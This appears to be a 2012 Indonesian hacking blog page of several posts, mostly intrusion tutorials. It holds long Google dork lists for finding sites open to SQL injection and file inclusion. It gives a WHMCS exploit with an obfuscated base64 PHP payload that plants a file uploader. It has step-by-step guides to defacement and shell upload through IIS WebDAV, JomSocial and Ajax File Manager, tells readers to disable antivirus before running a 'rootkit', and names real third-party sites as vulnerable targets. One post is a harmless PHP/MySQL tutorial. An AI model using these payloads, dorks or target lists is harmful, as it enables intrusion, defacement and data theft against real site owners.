D.FA.C One-X: 2012

SQL Dork

SQL DORK

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()

inurl:”id=” & intext:”Warning: mysql_fetch_array()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: is_writable()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: Unknown()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: pg_exec()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: mysql_query()

inurl:”id=” & intext:”Warning: array_merge()

inurl:”id=” & intext:”Warning: preg_match()

inurl:”id=” & intext:”Warning: ilesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: require()

inurl:(0x3a,version

inurl:(@version,0x3a,databse)

inurl:(user,0x3a,pass)

inurl:+union+select+ from

inurl:+union+select+ pass

inurl:+union+select+ SHOP

inurl:+union+select+ admin

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

RFI AND LFI

RFI

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org

/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org

/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org

/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : “powered by AllMyLinks”

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?

/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php

yahoo = by Kietu? v 3.2

/kietu/index.php?kietu[url_hit]=

11. keyword : “Powered by phpBB 2.0.6?

/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : “powered by CubeCart 3.0.6?

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : “powered by paBugs 2.0 Beta 3?

/class.mysql.php?path_to_bt_dir=

14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php

/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php

/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : “powered eyeOs”

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id

diganti dengan :

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html

/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=

/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=

/application.php?base_path=

23. allinurlp:hplivehelper

/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : “powered by Fantastic News v2.1.2?

/archive.php?CONFIG[script_path]=

26. keyword: “powered by smartblog” AND inurl:?page=login

/index.php?page=

27. allinurl:/forum/

/forum/admin/index.php?inc_conf=

28. keyword:”Powered By FusionPHP”

/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp

/shoutbox/expanded.php?conf=

30. allinurl: /osticket/

/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : “Powered by iUser”

/common.php?include_path=

32. allinurl: “static.php?load=”

/static.php?load=

33. keyworld : /phpcoin/login.php

/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:

/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=

/classes.php?LOCAL_PATH=

LFI

acion=

act=

action=

API_HOME_DIR=

board=

cat=

client_id=

cmd=

cont=

current_frame=

date=

detail=

dir=

display=

download=

f=

file=

fileinclude=

filename=

firm_id=

g=

getdata=

go=

HT=

idd=

inc=

incfile=

incl=

include_file=

include_path=

infile=

info=

ir=

lang=

language=

link=

load=

main=

mainspot=

msg=

num=

openfile=

p=

page=

pagina=

path=

path_to_calendar=

pg=

plik

qry_str=

ruta=

safehtml=

section=

showfile=

side=

site_id=

skin=

static=

str=

strona=

sub=

tresc=

url=

user=

»» READMORE...

Tutor Hack Whmcs Part 1

Oke Kita Skarang Blajar Hack Whmcs ..Udahh Siap Semuaa .. Tapi Bentar Dullu Dah Pada Tau Belomm WHMCS Itu App ..Oke Yang BElum Tau Merapat :DNieh Tak Jelasin WHMCS Itu Appa ._
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
Kopi biar ga ngantuk
Cemilan ..
dan lain lain .. :D

Hack Whmcs Itu Ada 2 Cara 1 . Dengan Metode Submitticet .2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=

Dork Lengkap Untk Teknik Submitticket
intext:Powered by WHMCompleteSolution
inurl:submitticket.php intext:Powered by WHMCompleteSolution
inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution
inurl:client/submitticket.php intext:Powered by WHMCompleteSolution
inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution
inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution
inurl:crm/submitticket.php intext:Powered by WHMCompleteSolution
inurl:cp/submitticket.php intext:Powered by WHMCompleteSolution
inurl:manage/submitticket.php intext:Powered by WHMCompleteSolution
inurl:member/submitticket.php intext:Powered by WHMCompleteSolution
inurl:members/submitticket.php intext:Powered by WHMCompleteSolution
inurl:billing/submitticket.php intext:Powered by WHMCompleteSolution
inurl:billings/submitticket.php intext:Powered by WHMCompleteSolution
inurl:support/submitticket.php intext:Powered by WHMCompleteSolution
inurl:help/submitticket.php intext:Powered by WHMCompleteSolution
inurl:secure/submitticket.php intext:Powered by WHMCompleteSolution
inurl:store/submitticket.php intext:Powered by WHMCompleteSolution
inurl:whmcs/submitticket.php intext:Powered by WHMCompleteSolution
inurl:log/submitticket.php intext:Powered by WHMCompleteSolution
inurl:myaccount/submitticket.php intext:Powered by WHMCompleteSolution
inurl:orders/submitticket.php intext:Powered by WHMCompleteSolution
inurl:order/submitticket.php intext:Powered by WHMCompleteSolution
inurl:portal/submitticket.php intext:Powered by WHMCompleteSolution
inurl:mc/submitticket.php intext:Powered by WHMCompleteSolution
inurl:office/submitticket.php intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:com intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:org intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:net intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:info intext:Powered by WHMCompleteSolution
inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution
inurl:".*/submitticket.php"
pilih salah satu yah kak di google, inget jangan malas yah mencarinya di google :D semangat terus jangan menyerah :D

#Injector : cart.php?a=test&templatefile=../../../configuration.php

Kita Bahas HAck WHMCS Submittiket Dullu ya .. _

Ini Exploit nya . Taro Di Subject ya .->
{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

oke skarang Buka Google TAruh Dork .. Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg TerPilih

Jika Sudah Masuk,akan seperti ini:

Nah Kita Succsees Buat / daftar Submitticket ..
Sekarang Tinggal Buka Dehh ..
Contoh .: www.domain.co/whmcs/submitticket.php?step=2&deptid=1
Diubah Jadi : www.domain.co/whmcs/downloads/indexx.php

TinggaL Upload Dehh Shell Kalian .
contoh : www.domain.co/whmcs/downloads/indexx.php
Jadi : www.domain.co/whmcs/downloads/namashell.php
Liat SS : http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash3/578572_167735916697117_192801804_n.jpg

Oke
Sekian Dullu Ya .

»» READMORE...

IIS Exploit Websites

Ini adalah cara termudah untuk Hacking Website,kita dapat meng-upload file Deface pada Vulnerable Server tanpa Username dan Password.

Step 1:
Klik Start lalu klik "Run"

Step 2:
Sekarang Ketik ini pada form Run

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Step 3:
Lalu Folder "Web Folder" akan terbuka
Klik Kanan di folder dan hoverkan mouse ke New, klik Web Folder

Step 4:
Ketik nama Vulnerble Web dalam form itu contoh:"http://autoqingdao.com/" dan klik Next

Step 5:
Klik Finish

Step 6:
Sekarang folder akan muncul. Anda dapat membuka dan menempatkan setiap halaman deface atau apa pun.

Step 7:
Letakkan File Teks Dalam Folder Tersebut .Dinamakan "securityalert.txt"(Anda dapat meletakkan sebuah shell atau HTML).Jika file muncul di folder maka Deface pun berhasil,jika tidak maka situs tersebut tidak Vulnerble.

Smoga Be'manfaat ;)

»» READMORE...

Deface Dengan WebDav Shell Maker

Langsung aja yau…mungkin deface dengan Web Dav itu deface paling bawah alias gampang.
Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…

Download Files Berikut :

Rootkit
Shell

(Password: cbf)

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.

Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.

Nih ku kasih tutor dikit mengenai aplikasi ini :

1. Jalankan Softwarenya

2. Pilih WebDav >> ASP Shell Maker

3. Klik Add Site>> Masukkan Website Target

4. Bila Berhasil akan seperti ini:

5. Terus hasilnya Co-Pas pada address bar, maka ada tampilan seperti ini.

6. Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface. Contohnya seperti ini:

Source: Binus Hacker

Semoga Be'manfaat and GOOD LUCK !

»» READMORE...

JomSocial ~ Joomla Shell Upload Vulnerability

Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!

-=~Good Luck~=-

»» READMORE...

Ajax File Manager ~ Shell and Files Upload Vulnerability

Buka Google Search Engine, Tipe ini dork: inurl :/ plugins / ajaxfilemanager /
Misalnya saya punya:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
atau http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/ atau situs lain ...

MisalNya :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Sekarang Cari Upload Upload dan Upload shell Anda / Deface / fileUntuk melihat Anda Berkas menemukan / Uploaded / direktori di Website dengan menggunakan Perkiraan Anda :P

example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt

Some Demo sites

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Results :
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere

»» READMORE...

Penerapan Koneksi PHP ke Database

Telah dijelaskan bahwa koneksi ke database merupakan salah satu fitur PHP yang paling sering digunakan. Apalagi PHP juga telah menyediakan fungsi-fungsi built in yang mendukung koneksi database ke MySQL server. Nah, setelah Anda sedikit banyak tahu tentang MySQL, kini saatnya untuk menerapkan pengetahuan tersebut untuk membuat aplikasi web database dengan PHP dan MySQL.
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
mysql> create database datakontak;
Pilihlah database tersebut sebagai database aktif.
mysql> use datakontak;
Buatlah sebuah tabel baru dengan nama tbl_kontak sebagai berikut:
mysql> create table tbl_kontak(
-> nama varchar(20),
-> alamat varchar(30),
-> telpon varchar(12),
-> email varchar(30),
-> tgl_lahir (date);
Tabel ini adalah contoh suatu tabel daftar nama kontak. Isikan tabel tersebut dengan data-data yang terdapat pada tabel di bawah ini:
Tabel Kotak : Record-record untuk tbl_kontak

nama alamat telpon email tgl_lahir !!

Anton Jl. Angsa 1-123456 anton@anton.com 1975-01-01

Betty Jl. Belimbing 2-234567 betty@betty.net 1980-02-02

Charlie Jl. Cakra 3-345678 charlie@charlie.org 1974-03-03

Diana Jl. Durian 4-456789 diana@diana.tv 1979-04-04

Enggar Jl. Elang 5-567891 enggar@enggar.info 1982-05-05

Fifi Jl. Flamengo 6-678912 fifi@fifi.biz 1977-06-06

Gina Jl. Gelora 7-789123 gina@gina.com 1973-07-07

Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456',' anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567',' betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678',' charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789',' diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891',' enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912',' fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123',' gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
# mysql datakontak < tbl_kontak.sql
atau
c:\mysql\bin> mysql datakontak < tbl_kontak.sql
Untuk memeriksa apakah pengisian data tersebut berhasil, maka buatlah query sebagai berikut:

myqsl> use datakontak;
mysql> select * from tbl_kontak;
Hasil yang diberikan seharusnya akan sama persis dengan yang terlihat pada Tabel Kontak.
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. Sintaksnya adalah sebagai berikut:
mysql_connect(host, user, password)
Server adalah nama server yang merupakan host dari MySQL server, sedangkan user dan password adalah user dan password MySQL. Contoh:
$conn = mysql_connect('localhost','root','root')
Setelah jembatan itu terbentuk, berikutnya adalah memilih database mana yang akan digunakan dalam aplikasi PHP. Fungsi yang digunakan adalah mysql_select_db(). Sintaksnya adalah sebagai berikut:
mysql_select_db(namadatabase[,koneksi])
Parameter koneksi adalah variabel yang menyimpan koneksi ke MySQL server yang dilakukan oleh fungsi mysql_connect(). Contoh:
mysql_select_db('datakontak',$conn)
Berikutnya adalah mengambil query dari database yang telah terkoneksi tersebut. Fungsi yang digunakan adalah mysql_query(). Sintaksnya adalah sebagai berikut:
mysql_query(perintahsql[,koneksi])
Contoh:
$qry = mysql_query('select * from tbl_kontak',$conn)
Yang terakhir adalah menampilkan hasil query tersebut ke halaman web. Fungsi yang digunakan adalah mysql_fetch_array(). Fungsi ini digunakan untuk memasukkan hasil query ke dalam array assosiatif dan/atau array numeris. Dalam bentuk variabel array, tentunya record-record tersebut kini bisa ditampilkan. Sintaks dari fungsi mysql_fetch_array() adalah sebagai berikut:
mysql_fetch_array(query)
Query adalah hasil query yang didapatkan dari fungsi mysql_query(). Contoh:
$row = mysql_fetch_array($qry)
Variabel $row inilah yang merupakan array yang menyimpan hasil query. Dengan demikian untuk menampilkan field-field pada query Anda dapat menggunakan $row[0], $row[1], dan seterusnya, atau $row['namafield1'], $row['namafield2'], dan seterusnya. Yang harus diperhatikan adalah bagaimana caranya kita menampilkan query tersebut sehingga sedap dipandang.
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.

<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>

<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.

Nih gan Sumbernya: http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656

»» READMORE...

Web Vuln

http://www.greenbergresearch.com/index.php?ID='403

http://www.firebirdsql.org/index.php?id='about-firebird&nosb='1

